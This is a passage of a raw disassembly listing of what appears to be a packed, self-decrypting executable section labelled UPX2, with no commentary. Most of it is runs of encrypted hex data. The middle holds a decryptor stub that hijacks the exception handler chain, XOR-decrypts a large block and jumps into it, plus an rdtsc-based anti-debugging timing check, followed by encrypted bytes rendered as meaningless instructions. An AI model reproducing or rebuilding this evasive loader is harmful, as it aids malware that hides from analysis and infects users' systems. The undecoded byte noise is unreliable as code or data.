2C3DFF2Eh, 0B8DFEEC9h, 1791045Eh, 2CC193FEh, 3DA348Eh dd 5F71CEE6h, 288F67AAh, 1AA2CA69h, 148F6BBEh, 87D21AB9h dd 2651968Bh, 688706B6h, 402D7141h, 44DB8CE6h, 4CCA247Eh dd 9CE7B3E9h, 20FA54AEh, 0BD9DF978h, 0D02A8455h, 43C35AFDh dd 0E80A804Dh, 670DB81Ah, 0F5E5907h, 0BF577CE0h, 5F62916Dh dd 7D51AC30h, 90DC7B06h, 688259BFh, 0C09174F8h, 674A895Dh dd 0F838A4C8h, 0B71EB9ADh, 4908D418h, 0B8126CFBh, 0B89D762Eh dd 0E8429CE9h, 0B267A03h, 1B70E7E7h, 353174FCh, 4894BC56h dd 24B9989Bh, 0F7E3D396h, 7176E05Ah, 27C1475Dh, 76A54CCBh dd 6DB9ECE6h, 70FC1BE6h, 0F797E6FEh, 0A0533551h, 4D12EC46h dd 0DC6DAFD0h, 2FF91504h, 3CD8BB06h, 0D10DB359h, 0CE386131h dd 0F4A98329h, 0C51D954Ah, 752AC2Eh, 7B95BB61h, 0CC85D74h dd 201A74AEh, 0D3723F28h, 75CD80F2h, 88D40376h, 1FA651A7h dd 19F6CF0h, 50AA2CF7h, 0D7DA19F5h, 25BC34B8h, 0DE598283h dd 9B1E26BDh, 0E64F014h, 61FD7C15h, 78D22CD4h, 106AC41Bh dd 0F7FE1A3Fh, 0BFCD3710h, 0EE091273h, 6F22E57Eh, 9783919h dd 0F4AA54AEh, 0C7F8C42Ch, 0EBD41121h, 0A8471C40h, 5D2BB51h dd 70F24CA7h, 0CF75017Eh, 0C8226D3Eh, 14DF476Eh, 9D3EC540h dd 0E58921CDh, 51F6B544h, 75E5748Fh, 5884330Ah, 0CB183101h dd 0D6B3CA0h, 204CEB5Ah, 0B812752Eh, 4CF575Eh, 0A727F797h dd 0F2BF5AF9h, 681BA455h, 0C66316EEh, 2FC7903Fh, 86D948Bh dd 872DC597h, 106AD7F6h, 0FA670FB6h, 2FEE872Bh, 0AA62E994h dd 1CA35217h, 807DB73h, 4809BCF9h, 2A7A13B9h, 832A84DEh dd 0BA35E13h, 502AC165h, 0F18425D4h, 55ED8152h, 1ECA2BD6h dd 8845EB86h, 0F852AC1Eh, 0F8A921CDh, 4DE5B257h, 0A96E1B80h dd 2AE27500h, 9C23D297h, 88875BF3h, 0C8C93C79h, 0EC429339h dd 6A1A81D3h, 8C289CC0h, 0D7DB5EDEh, 247859D9h, 8C836488h dd 0E370372h, 0CA3AA2D5h dd 106FA146h, 406AF220h, 1DFD0CE6h, 40ACCEFEh, 0DC328D8Eh dd 71A0707Eh, 7CF74341h, 0F4FA6291h, 0C7C5E82Ch, 0E615F04Bh dd 7C069F76h, 3F3601F1h, 0D0D4C90h, 30BCDFBCh, 7DAFBF89h dd 608C2A06h, 7EC75350h, 13EA72A5h, 0AC8D23CEh, 0C01A7475h dd 67CA89EFh, 0F020A4C8h, 4A77C3C0h, 0A57AE215h, 1C966306h dd 7BAA045Eh, 8212CC36h, 81B0648Dh, 1872CC4Eh, 25F5327Eh dd 4894C734h, 0EFC56C6Dh, 78D7C402h, 6CEF4D1Eh, 25026A89h dd 76A574C3h, 50A701E6h, 21CA1241h, 5862D644h, 9B74C151h dd 0C011EC70h, 66AE8B21h, 2C21C73h, 7CEF4B0Eh, 67F27A99h dd 6B16EABh, 37DAFFD6h, 65259061h, 7DDBAC06h, 90DC7B0Eh dd 0EB811505h, 0AA4B249Fh, 0ED4D5D62h, 0F07C9B82h, 0B384A969h dd 0E0FFD418h, 0BD69E8C9h, 9999045Eh, 0D7D6197Fh, 0D18B34B8h dd 186DA477h, 4F5A64B1h, 7E9952C3h, 0EFFA11EEh, 78D71802h dd 88EF4D1Eh, 6B026A89h, 40EAFCF6h, 0E07907E6h, 486FA189h dd 862BC20h, 0A68F44AEh, 28F56945h, 21984E8h, 9935DD75h dd 85D355F9h, 98C47302h, 30A24B86h, 0F469F7D6h, 70DD916Dh dd 2A61AC30h, 611D859Dh, 0AD0B3DC1h, 0C02C4B52h, 130503A5h dd 0C5A95DF8h, 87FA6F1Bh, 236E9799h, 79792516h, 0D17A0776h dd 8135C3CCh, 9DAECDE0h, 197EB6A5h, 0FB8184CCh, 5CE0776Ah dd 6D2AD6EDh, 8F2D64C2h, 2BABE7C7h, 9E3DCC33h, 1411374Eh dd 18019CC2h, 7072A6F1h, 83A1BC16h, 2DF1BF61h, 0EAC84FBh dd 0FA178DEh, 546ED545h, 3C5CC66Fh, 0B4F03BDCh, 6CB64E1Eh dd 0E61E90A2h, 6086C91Ah, 31B14473h, 0D5D74515h, 5C82996Eh dd 834949C5h, 0DDBD0C34h, 0FB55BCDh, 0DFDF3F1Dh, 2F399A67h dd 47ED4A42h, 13FD39A1h, 6C4DD2A3h, 7F25CB95h, 2B319B1Bh dd 0A08E6B8Ch, 755D03A9h, 0AF6EC7BEh, 87D7A889h, 0CB593BE1h dd 57FC715Eh, 0A88A81B1h, 27CD701Ch, 8F340596h, 0E4E6B3E9h dd 9305AB50h, 38840494h, 0B3C284DEh, 803DE389h, 5AB40Eh dd 0CB1FCDFBh, 0D98AD20Dh, 0C8227F0Dh, 0EB88EB0Ah, 0CE6D34B3h dd 0B263209Eh, 65BC5D50h, 49F7B94h, 0D3B20C65h, 2E4998A0h dd 0D8D9BDF0h, 94FFDB6Bh, 4F126CC5h, 70AA121Dh, 6D4D9CF6h dd 80DA3729h, 1A2E8FD0h, 0B397E0B1h, 0B29FC56h, 409AA9E6h dd 0FCDD8C26h, 106AC791h, 88227C8Bh, 0C41EFB6Eh, 30328CE5h dd 8F35DAC7h, 0B1B3E19h, 57954AEh, 38A4D39Ah, 0D8680FDEh dd 43D256FDh, 335EC7CFh, 9BF7A766h, 20C06DF6h, 0F782F95Fh dd 2AB91458h, 0F852140Ah, 78BB449Fh, 0D77D3BA6h, 0F8B9E1FEh dd 78030C50h, 0C8EE11CEh, 0A8883CA0h, 58221DD0h, 5F6484D2h dd 822FFBA1h, 3B8008F9h, 254F056Ch, 0F372FA1Eh, 158F935Bh dd 48A2CA6Eh, 943B94EEh, 0DD57DBA4h, 136AF226h, 0DD025CB6h dd 0E53F7542h, 2732BADEh, 9B31DB81h, 0ADEF3D1Ch, 0A0FA6296h dd 509AEC46h, 0D02A84D8h, 68C4742Fh, 0E802B40Eh, 670DAB8Eh dd 81761B4h, 4CA47CE0h, 56828944h, 65D72406h, 72EA72A6h dd 8D072BD6h, 0C81A42F6h, 2DB20C66h, 6FF724F7h, 89E20AAEh dd 0A58D115Ah, 0B8245463h, 58AA045Eh, 55C28782h, 80EC0C13h dd 98C2B823h, 8632FA03h, 0EFD6F956h, 0D8A5296Eh, 0CD72CB0h dd 0B5EF3380h, 0A8026A8Eh, 341AF44Eh, 458F0CEFh, 72CA1246h dd 0ADE13561h, 0A0CC6B4Eh, 0CB950446h, 0B1C27B21h, 803DE38Bh dd 5AB67Eh, 0A76ED12Dh, 0AD89E408h, 0C8144376h, 9F466D86h dd 0A8D6A3F9h, 1BEA449Ch, 1EBD4483h, 0FC44FFCEh, 225AD265h dd 0FFB55B03h, 88E00614h, 430552Eh, 58126CA6h, 6F8FAD5h dd 0EB56E6F5h, 52D24F4h, 1844F483h, 0A00A64BEh, 0F52BE823h dd 0E00CAB0Ah, 4062990Bh, 9DE1C428h, 0A8344CD1h, 0F9CD50BDh dd 0D83286CAh, 60CA91F3h, 0AD91BC20h, 0A219541Fh, 0BD6548B5h dd 0D01CBC7Bh, 78C21C76h, 0F43001h, 0EB0D4CA6h, 0DE3C0C16h dd 5DA98329h, 608C2BBAh, 7C5D7E83h, 90EA4406h, 171A69BDh dd 8A9174F8h, 7CF88D76h, 104AA49Eh, 0FBEA76BDh, 23B3E72Ch dd 352978B4h, 509C1439h, 0F825117Dh, 0D6A834B8h, 9B56F0ADh dd 861A031Bh, 0EF21FC56h, 0E03A9489h, 70A8A786h, 13628E1Fh dd 23F5DB41h, 76A558CBh, 7DB77BE6h, 30CA1246h, 7C62BC16h dd 0A3E2A3ACh, 8BBE034h, 0EFCA3157h, 1B491C40h, 0F76AB526h dd 0AECAE923h, 308AA43Eh, 3F2008D6h, 29524576h, 0A1AD53FAh dd 0E3E94875h, 24F0F71Eh, 64E9229Fh, 0ED3F5539h, 0F07C9C4Eh dd 0B706811Fh, 8489D418h, 891D3299h, 832D89CCh, 0D2429CF6h dd 0B6E2971Bh, 7174B926h, 845C1C6Ch, 0B8F27444h, 1FE03406h dd 32597679h, 20C712h, 90A7D941h, 409AF478h, 99BF9CE6h dd 0F9D9517Bh, 3E5D5C9Bh, 0C77F57AEh, 0BB92DA56h, 0D02AE379h dd 2BE91C76h, 52DD3D26h, 6FF24CA6h, 6B684BBh, 0C8227DD6h dd 0A7BD606Eh, 58F2A445h, 151DE43Eh, 28B4E493h, 401A74CEh dd 0B0E00B12h, 0FB55384h, 686FB7CCh, 0C37AE211h, 9059E5C3h dd 0DD2109B5h, 0E874A32Ah, 8331366Dh, 0EF5A87ADh, 8632C13Bh dd 48A2FF56h, 6B2EE0EEh, 4EEDC803h, 0C0E7C71Eh, 0AB026A89h dd 76A538CBh, 533A8DE6h, 0F5413434h, 854838Ah, 0D3F21E97h dd 30D86545h, 533AC6DFh, 0E3C24415h, 3665108Bh, 0B04224A6h dd 728BE43Eh, 8B2325DEh, 0C32F9E3Eh, 0F529A3Eh, 0A6D2E11Bh dd 2882DC36h, 0C31C00DEh, 6EA26BEBh, 74A12FEh, 0BEDA9913h dd 227AD42Eh, 460619C6h, 0F52FF398h, 0E842AACEh, 0F5DA308Eh dd 0BCC74620h, 470A5286h, 7E9A59D3h, 0E07A94EEh, 0F2D95986h dd 0BAA8C619h, 5FE08AB4h, 4710FDA5h, 0DA984ED4h, 433DC6A8h dd 2AE9D8C4h, 0F8F8DBCAh, 7EE51C5h, 0DF2A84E8h, 9738C2F2h dd 98EF4BF1h, 67F27A99h, 6B136ABh, 5C9783D6h, 9FBA2251h dd 0CE69EA93h, 1067C99Eh, 0A582EA09h, 0F625FC5Bh, 32E05D66h dd 8CFF5BFEh, 77E20AA9h, 164112BBh, 0C4A793C6h, 0AFAA3261h dd 0DE79DA63h, 0E86FB98Eh, 0E772FA18h, 86351C0Bh, 0DD5DAA56h dd 0E00CAF2Ch, 47AE8905h, 0D36AC428h, 0A8025C5Eh, 41F0A94Eh dd 0EF826167h, 80922448h, 7CE77D19h, 25FA62BBh, 0F0112F86h dd 11257421h, 5ED768F3h, 1067770Eh, 0EDF266A6h, 4C0B8222h dd 0B94E70F2h, 88DA071Bh, 7AD53C2h, 440241EBh, 0C07D23CCh dd 3FE58B1Ch, 754D2207h, 0E27EF286h, 88E2192Eh, 8592B42Eh dd 0CDED9339h, 74EE8F67h, 80F711C6h, 0BDA02B0h, 9914C476h dd 0C3086284h, 48CAAA73h, 6B3A6BEEh, 2AD24642h, 2FF3B4Eh dd 2B026A8Ah, 7E1BFC8Ah, 840DB3BAh, 0B649270Bh, 0F2E35412h dd 0DF12AB51h, 596D13B9h, 0D05E3C1Dh, 0D9291C76h, 5A9BB6h dd 98EFA4A6h, 1048E43Eh, 0C812C4D6h, 7052146Eh, 3A52AC06h dd 155244BAh, 0C082DC37h, 0C01A74CDh, 0D5B220A4h, 3D4680AAh dd 881ABFB8h, 0C81ACD52h, 0B8126CC6h, 608E50D5h, 695817ABh dd 0B6E2B363h, 0F9C82426h, 726B9B41h, 4AA1FC52h, 0E53D92EFh dd 635F8C0Eh, 15FF2971h, 1001194h, 90h, 1CDh dup(0) dd 4520B100h, 31h, 13D8h dup(0) ; --------------------------------------------------------------------------- pusha push ebp mov ebp, esp call loc_3145A013 call sub_3145A0C4 jmp loc_3145A076 ; --------------------------------------------------------------------------- loc_3145A013: ; CODE XREF: UPX2:3145A004p push dword ptr fs:0 mov fs:0, esp mov ds:dword_3145A0AE, ebp xor ebx, ebx push ebx push 80000000h push 4 push ebx push ebx push ebx push ebx push 80000000h push ebx push ebx push 1000h push ebx push ebx call ds:dword_3143808C ; LoadLibraryA xor ebx, ebx push ebx push 1 push ebx push 4000h push ebx push 80000000h push ebx push 1 push 100h push 80000000h push ebx push ebx call ds:dword_3143808C ; LoadLibraryA loc_3145A076: ; CODE XREF: UPX2:3145A00Ej stc sub esi, esi sub ecx, ecx mov cl, 38h loc_3145A07D: ; CODE XREF: UPX2:3145A07Fj inc esi dec ecx jnz short loc_3145A07D call $+5 pop edx sub edx, 0FFFFFFB5h sub ecx, ecx or ecx, 28B0h push edx loc_3145A096: ; CODE XREF: UPX2:3145A0AAj xchg al, [edx] cld xor ax, si cld stc stc cld mov [edx], al add edx, 1 inc esi dec ecx cmp ecx, 0 ja short loc_3145A096 pop edx ; --------------------------------------------------------------------------- db 0BDh dword_3145A0AE dd 12FF6Ch ; --------------------------------------------------------------------------- mov esi, [ebp-8] mov fs:0, esi leave mov [esp+14h], edx popa jmp edx ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_3145A0C4 proc near ; CODE XREF: UPX2:3145A009p arg_C = dword ptr 10h mov eax, [esp+arg_C] pop dword ptr [eax+0B8h] xor eax, eax retn sub_3145A0C4 endp ; sp-analysis failed ; --------------------------------------------------------------------------- call $+5 mov eax, [esp] cld mov [eax+2FE3h], ebx test dword ptr [eax+28A0h], 80000000h mov ebx, [esp+4] jz short loc_3145A11C pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_3145A113 add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3145A11B ; --------------------------------------------------------------------------- loc_3145A113: ; CODE XREF: UPX2:3145A104j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_3145A11B: ; CODE XREF: UPX2:3145A111j pop ebx loc_3145A11C: ; CODE XREF: UPX2:3145A0EEj push ebp mov ebp, eax sub dword ptr [esp+4], 5 sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0 rep movsb call sub_3145A191 mov ecx, eax call sub_3145A191 sub eax, ecx jz short loc_3145A165 cmp eax, 100h ja short loc_3145A165 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_3145A195 jmp short loc_3145A1A4 ; --------------------------------------------------------------------------- loc_3145A165: ; CODE XREF: UPX2:3145A14Cj ; UPX2:3145A153j test dword ptr [ebp+3638A5h], 80000000h jz short loc_3145A18F lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3145A18F: ; CODE XREF: UPX2:3145A16Fj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3145A191 proc near ; CODE XREF: UPX2:3145A13Ep ; UPX2:3145A145p rdtsc retn sub_3145A191 endp ; --------------------------------------------------------------------------- db 0E4h ; =============== S U B R O U T I N E ======================================= sub_3145A195 proc near ; CODE XREF: UPX2:3145A15Ep mov dh, dl mov ecx, 27D2h loc_3145A19C: ; CODE XREF: sub_3145A195+Cj xor [eax], dl inc eax add dl, dh loop loc_3145A19C retn sub_3145A195 endp ; --------------------------------------------------------------------------- loc_3145A1A4: ; CODE XREF: UPX2:3145A163j sub ebp, gs:[eax+5BBDA78Bh] dec edx mov esp, 0CE7D9A4h push esp ror edi, 8 loc_3145A1B6: ; CODE XREF: UPX2:3145A1DFj in eax, dx sal byte ptr [ebp+ebp*8+2B87EB93h], 1 dec edi int 3 ; Trap to Debugger mov dl, 39h movsb shl byte ptr [ecx], 1 cmp eax, 0A0A49BC0h mov edi, 6C1A0F73h mov ebx, 33DFE05Eh cmc and eax, 9952936Fh test ah, dl mov al, 0F8h stc jns short loc_3145A1B6 inc eax sbb [edi-79h], ebp mov eax, ecx in al, 71h ; CMOS Memory mov edx, 2B5979D6h in eax, 0BCh ; Interrupt Controller #2, 8259A mov al, 0F3h db 2Eh, 64h jge short near ptr loc_3145A1FF+2 pop ds fild word ptr [ebx] pushf xor ch, bl db 3Eh xor al, 0Fh loc_3145A1FF: ; CODE XREF: UPX2:3145A1F2j or ebx, [edi-74h] sbb eax, [ebx+1020A097h] hlt ; --------------------------------------------------------------------------- fdivr st, st(7) int 3 ; Trap to Debugger jmp short loc_3145A229 ; --------------------------------------------------------------------------- dw 7829h dd 0ACB89675h, 0AF3F88C1h, 0A67991E2h, 988C9EFFh, 1C3859h dd 0F1C9BAA7h db 0 ; --------------------------------------------------------------------------- loc_3145A229: ; CODE XREF: UPX2:3145A20Cj cmp eax, 86615679h mov eax, 0A32B94F1h xchg eax, esi lodsd lea esp, [esi-6B677D15h] insd inc esp sub [edi+esi*4], cl mov cl, 0CCh shl cl, 1 pop ss cmp al, 69h bound eax, [esi-285F3149h] xchg eax, edi call far ptr 0A4F6h:0E7B691B9h pusha scasd push ebx xor al, 18h jns short loc_3145A27C retf ; --------------------------------------------------------------------------- db 2Ch, 2 dup(8Fh) dd 0FF4CC7ABh, 0A6978671h, 2FFCDD74h, 0B0CF6981h, 6CE1F894h dd 0D1EC3E31h, 0D5838CC1h ; --------------------------------------------------------------------------- loc_3145A27C: ; CODE XREF: UPX2:3145A25Aj lodsb pop ss cmp dh, al sub dh, ds:485295B0h mov ds:8ACD7095h, eax mov al, ds:95CF6F6Fh nop in eax, dx jmp far ptr 2124h:0C90BA4C0h ; --------------------------------------------------------------------------- db 2Eh, 0FCh, 0E0h dd 65F40D47h, 831C3862h, 0A6B9B441h, 0E66B5874h, 86DE3981h dd 0F5D57994h, 0D0DA3376h, 758C2D39h, 393F2872h, 0BBC20559h dd 309D4852h, 0A0BF541Ch, 0A5B33784h, 0C0EAC38Ah, 5F736065h dd 0E0FCCCB0h, 64CB23C4h, 0C31F783Eh, 90BCC88Ch, 76B9D17Ch dd 0D8CCDE3Fh, 405C089Dh, 4513084Eh, 604AA362h, 7403E8C1h dd 809CBA3Ah, 1099C5F3h, 2BBCEEE4h, 3C4FD16Bh, 2D5DF814h dd 505A98A4h, 0F2AD8DB9h, 0D57FA8F2h, 0EC9FDAABh, 0FA5043C4h dd 79FC6B7Ch, 0ABF57D89h, 0EBAF78A2h, 8765F4AFh, 7C3B66A4h dd 0F00F4013h, 1563B8D5h, 101A7332h, 259C1C77h, 0AFC86744h dd 57DCF816h, 510688CEh, 0E0F8185Ch, 708CC044h, 95E33855h dd 909AF3B2h, 0A43398F1h, 0B0CCEA86h, 280C78FEh, 0D0E80824h dd 88BD98DEh, 0F1667F48h, 809DD084h, 85D34865h, 0A08AE3A2h dd 314C62ECh, 96490714h, 0B86CBE9Fh, 0E0FC1831h, 708EF92Dh dd 591C5254h, 9AC6C207h, 1BF6CD8Bh, 4127E832h, 36E1FB57h dd 0D0EC3E1Fh, 62481CBBh, 0F6E42844h, 0CE9CB8D4h, 5C600C30h dd 322927F4h, 0BD4C5EBFh, 0F6CB32A1h, 0DDA5BBA4h, 0D6C7C689h dd 0E38219C4h, 1E4CBCh, 82114BE4h, 203C6E48h, 0B2CC6C0Bh dd 0C5D77894h, 0D0DA33C6h, 0EF7DE84Bh, 0C63BD4C1h, 7A1933D4h dd 0EF2C7E5Fh, 2533D984h, 307A50CDh, 0FB3A7D9Fh, 20938892h dd 0B0799735h, 0FB8C9EFCh, 3627D2D9h, 6FB62BE4h, 0A5B35905h dd 0B0FAD059h, 7BAEF51Fh, 0D90F0812h, 0EF7DE94Bh, 0C63442C1h dd 812450D4h, 0ADA14864h, 0A08AE49Ch, 3026A70Fh, 0B02321E2h dd 538D0BA0h, 19FF585Eh, 1A8CC293h, 0D7A9B54Ch, 29ACFEF1h dd 203C586Dh, 4E81EC89h, 26A3876Bh, 9DE8858Fh, 607C98B4h dd 0B7818322h, 64AE13D0h, 2B38DDE9h, 0C610D8C2h, 9B2A6A0Dh dd 22DE3A97h, 3AB80351h, 90F57034h, 0BC07A8C4h, 0C497383Eh dd 90C4C88Eh, 4A345874h, 0DA9EB944h, 0D5A3289Ah, 0D0DA33CAh dd 20B81BECh, 0F07C212Ch, 0EA4833D4h, 7AE0C364h, 0CABCB2B4h dd 30263A86h, 0C0ACF17Ch, 16CE2A4h, 1FACE75Eh, 46B75E51h dd 85456754h, 9728C71Bh, 0AD3C5875h, 86DCE8B1h, 4C5FC194h dd 3F670824h, 8DFD3D47h, 0F03A3844h, 94AB3D59h, 0F0D34852h dd 80D68CA4h, 0A5B397EEh, 0C0EAC3EAh, 25334821h, 0E1B2F000h dd 6164A8C4h, 531C3854h, 0F2C98C81h, 526C3F01h, 0DCA59E6Dh dd 40391FF1h, 0D5A3E073h, 0D58398B4h, 0F03A1728h, 0BB1E2D2Bh dd 0EF7B4852h, 96879E61h, 5A4C0284h, 0B6490716h, 0E96CBE9Fh dd 0E0FC191Ch, 0F96D8353h, 57481C58h, 0AB165D1Bh, 0D60F5842h dd 8C9A4D87h, 145C78A2h, 6E79F773h, 0E57CAE8Fh, 0B66A5C84h dd 0F2984657h, 3458B78Ah, 0CABCB2FCh, 86D997AEh, 45DCCE2Fh dd 0C3B0FC64h, 0E0F99FDCh, 0E1459BC4h, 852502B7h, 909AF4B2h dd 5CBD6A01h, 0C3AFCC20h, 68280BE6h, 0DE71C9A5h, 342C98B4h dd 0A05D7E14h, 1563EB84h, 101A730Ah, 0D4E51871h, 1438978Bh dd 9659771Ch, 0B86CBE98h, 1F03E5F1h, 36195797h, 0EB1C0E6Fh dd 0B868496Ah, 773C5875h, 8B8A7DFBh, 0D5A378A2h, 0D0DA3362h dd 9F87F05Dh, 9A5628BBh, 0EA9CD2D4h, 782C2264h, 0A0B8D8F5h dd 3026AC0Fh, 4BD09244h, 68E7760h, 0E0C8474Ch, 98459BC4h dd 0FFE3C78Eh, 85EA5D69h, 716E5842h, 2533B855h, 406A43DEh dd 13CCCCA7h, 3824C024h, 0F03C2144h, 8092D0D4h, 102C4964h dd 0A0BCD8F4h, 304C6884h, 0C0F45D14h, 506C88A4h, 0B3AA4934h dd 4BDE3D3Bh, 59B73862h, 0E56C4C48h, 0E3D2BA8Fh, 0A9BD7D89h dd 0BF0E78A2h, 0E6D7A2B1h, 0CF911B4h, 180C1E7Bh, 809CB8C2h dd 7B432728h, 0D2ECA881h, 5C251EEDh, 96B99F71h, 3519E4C5h dd 1FAC1875h, 46B7FA51h, 7099B154h, 53ACFEDBh, 535D1A28h dd 0DDADA661h, 22131CF1h, 0A48F6D4Eh, 142AC4C7h, 846F4D17h dd 0F4EFD4D4h, 7E492416h, 0C5CE9BF4h, 76291CE5h, 81B9947Dh dd 351ECBA4h, 0A6996C55h, 3DE9C4ADh, 696C4835h, 90EDAF8Ah dd 41592A37h, 0C29C8D70h, 33391BFBh, 93EC4957h, 141DFDC6h dd 9D697A21h, 0D4F9CCBBh, 71493A0Ch, 0D2FFD890h, 553809E1h dd 0A5AE9040h, 136CECC5h, 949D7D46h, 1FE3FCA1h, 6C795038h dd 0C39EFB94h, 534C391Ah, 0B0B8876Ch, 343500D1h, 0B59E6070h dd 267CFCD5h, 0A469442Dh, 0D4F9D5BDh, 63551B0Bh, 0F4D1BD80h dd 302905EDh, 0A5B98A52h, 220EE1E8h, 0E0856A55h, 36F8CD83h dd 4179543Dh, 0F9DEBC90h, 45482D16h, 0F7CCA977h, 291A0CF1h dd 0B9BF6D48h, 277CFDCEh, 994A5C21h, 0E9C8DDB8h, 572C2D09h dd 0CFF1AC91h, 55201DE0h, 0A4B2995Ch, 502DEDC8h, 0B4887D73h dd 36FCC5A1h, 4E79543Dh, 0D1C9A585h, 54591F74h, 0C0A18D50h dd 282819C4h, 0B5AB0865h, 1219CEC0h, 9E634137h, 0F4F9FFD4h dd 635E2D32h, 0E5D2B79Dh, 774C29FCh, 0AF8A8C71h, 3501FDC8h dd 8F9A767Dh, 4EDC5B6h, 4172573Dh, 0F1C384E4h, 42551410h dd 0C9BE8976h, 211178D5h, 0B5855E54h, 261AD7C3h, 0F069442Dh dd 0EEF9C89Bh, 75402122h, 0D0CCB9B9h, 712B06EDh, 0A5ACB714h dd 3F1ED8CAh, 938F7D57h, 1FFEF8C4h, 736F5D37h, 0F9EAFAD7h dd 20482B06h, 0D3A39A54h, 732F0BF1h, 0A8894616h, 52F98C0h dd 9C656E30h, 0F4E8F9B1h, 654E2116h, 0E1CFBD80h, 44293B84h dd 0A5B09152h, 3501E1F0h, 85904B34h, 238CD8A1h, 65684B2Dh dd 0FDC59C89h, 66530C11h, 0E4A9846Dh, 403915FDh, 0B1816671h dd 515CEC4h, 0B66A6733h, 80F9D4BDh, 645E2132h, 0E1D0B981h dd 532304E8h, 0A9AEAF14h, 392AEDD0h, 0AEFC7D58h, 1AE8E9B0h dd 50684B21h, 0F9DAA196h, 455B3D18h, 0DBA3BC77h, 0E5C16F1h dd 0B59E4B50h, 2619ECD5h, 0F069442Dh, 0F2DFCC9Ah, 75582901h dd 0C3D3AAA4h, 303F1BE1h, 0B29F8C5Ah, 3518E9C1h, 83936A64h dd 35FFDBA1h, 7452382Ch, 0F1C9BAA7h, 456F3D00h, 0DFA59C67h dd 341278FAh, 0B1897A67h, 1329FDC0h, 825C5A21h, 0F3F9DBBBh dd 64624817h, 0F6CCB9B9h, 7F3B0DEDh, 0A3B9AB72h, 3E03E1D0h dd 0AF885634h, 36E2CDB4h, 79543Dh, 0E0E3BCAAh, 526C3611h dd 0C3A98B6Bh, 2B332CE7h, 9EEC6641h, 50CD7C0h, 93697B2Ah dd 0EEF3D1A0h, 40580664h, 0C5C8B786h, 591A1CE7h, 0A1A98C66h dd 3D09C5C8h, 0E0856A5Bh, 5DDDC8Ah, 49654A31h, 0E2C3AE8Ah dd 49483919h, 0DF98866Bh, 40321DFFh, 0A2BB7C6Ah, 3619ECDDh dd 85785A2Dh, 0E5D1D4B5h, 695E2709h, 0CCC88AF4h, 532506D1h dd 93B99C7Bh, 3E05FAD0h, 0A1934C53h, 23E5DBAAh, 6E754A20h dd 0C3FBC883h, 41480B35h, 0C0B99C76h, 2F301B94h, 0BF9F6D57h dd 1419F3D7h, 9E634B44h, 0F4FFDDBAh, 64492F64h, 0D4CFB79Ch dd 512211E6h, 0B2DC9D79h, 501AEBC1h, 84927D47h, 13E3DBC4h dd 685D3Fh, 0F5D8A6ADh, 54593606h, 0C3A38447h, 2E3D30F1h dd 0D0896440h, 508F6FDh, 84694636h, 0C3E8DD93h, 7542260Bh dd 0C4D9AC97h, 442D1CD7h, 0AE95F871h, 3E1EEDD0h, 90B36C51h dd 70CDC6A1h, 6568561Dh, 0E4C9A696h, 4E59283Bh, 0F1A09A51h dd 34323194h, 0B5827A41h, 119CAC0h, 9C656E20h, 0C4DDB8B1h dd 597C0932h, 0E492EAC7h, 624C24C8h, 0AC9F9F71h, 1B09FBCBh dd 0B2FC6151h, 0C3CFA1h, 65575631h, 0D1D48D9Dh, 47590A74h dd 0C2A99D55h, 2C3D2EEDh, 0A8A96D51h, 52E98F5h, 84697B23h dd 0F5F0D982h, 51540D01h, 568F8EF4h, 661A6AEEh, 0C1B62C9Fh dd 481E77F6h, 9069E762h dd 0FB8C9EFBh, 564A6E90h, 0E0539EB4h, 0FEA9A76Ch, 33CCDE3Fh dd 82026850h, 9961082Ch, 31B4B34Fh, 0F00C282Ch, 0A4D0353Ch dd 7A2C2267h, 0F3EC89F1h, 0FCC76DEEh, 90087344h, 12CE2F0h dd 75034B66h, 70BA94C2h, 0FF10FCD7h, 0A690C671h, 28F8DB74h dd 0A45965C7h, 735C4EAFh, 82EC62EDh, 527CA8DCh, 0A1C8A344h dd 0D0DCD285h, 93342235h, 0CAE8D034h, 0A5B3388Ah, 0C0EAC416h dd 634C4C27h, 0EF3C9DE6h, 0AA7B6A5Dh, 0C3DE1B0Ch, 7853FBB3h dd 0DFC3A7B5h, 0B0696C0Bh, 280C7894h, 0D0EC782Dh, 60164C3Fh dd 0B066E4CFh, 909CB8BCh, 422E2264h, 0A9D4D89Eh, 5A4C68F4h dd 908FA914h, 6B9A1D5Bh, 0B9A31802h, 4BCA3D3Bh, 0FF993862h dd 1D27B990h, 200A4D08h, 2541E4E7h, 406A6894h, 83BBD927h dd 0E5F74A4Bh, 0F03A13A6h, 0A7673759h, 3BC44864h, 2B43270Bh dd 6779201h, 88537514h, 0B86C888Ch, 1F03E72Eh, 4B6A2D4Fh dd 8F913862h, 90ACE0ABh, 0DFC3519Ch, 5A4963FBh, 0C55C4EAFh dd 5DCC7CE4h, 6054C43Bh, 0EF8C044h, 517472Bh, 101A7396h dd 0ABC81871h, 1825E709h, 1F34F814h, 0DB93775Ah, 0B53F47F3h dd 708CA82Ch, 0ED9D6554h, 909AD3F4h, 0A5B19147h, 0B0FAF699h dd 110D2CC5h, 2FBD5974h, 5647EA21h, 0D408AF44h, 0BBDA2D2Bh dd 0D2714852h, 48E9D8F0h, 304C6884h, 0FF317949h, 3A6CBEBFh dd 0EA6995CBh, 208C9EDFh, 243CF506h, 13ACE2E4h, 0E75A54B0h dd 86D7B881h, 877CB594h, 0E6F75AA1h, 4A7CBCB4h, 9ACF7544h dd 8974E0CEh, 9D2C4864h, 5E16B9B6h, 0F3BC1D4Dh, 0FCBC6D7Dh dd 0D4698892h, 69BE103Ch, 46B0C851h, 0C3FECF54h, 90AC20B1h dd 0A1615874h, 86D771E9h, 24C1F394h, 53EC3E18h, 6074BCC8h dd 0F0B5AC4Bh, 6C1DB8D4h, 102C4A6Ch, 0A1B8B0A0h, 0A5B36884h dd 0C0EAC38Eh, 0D4E1742Fh, 0E0FD1C10h, 70E6F8C4h, 1C3CBCh dd 0C2FE9EE4h, 0B5C30F74h, 0B0FAD392h, 0D7D1B1A7h, 0D0EC0920h dd 6216C9E5h, 980D4215h, 0C09CB8D4h, 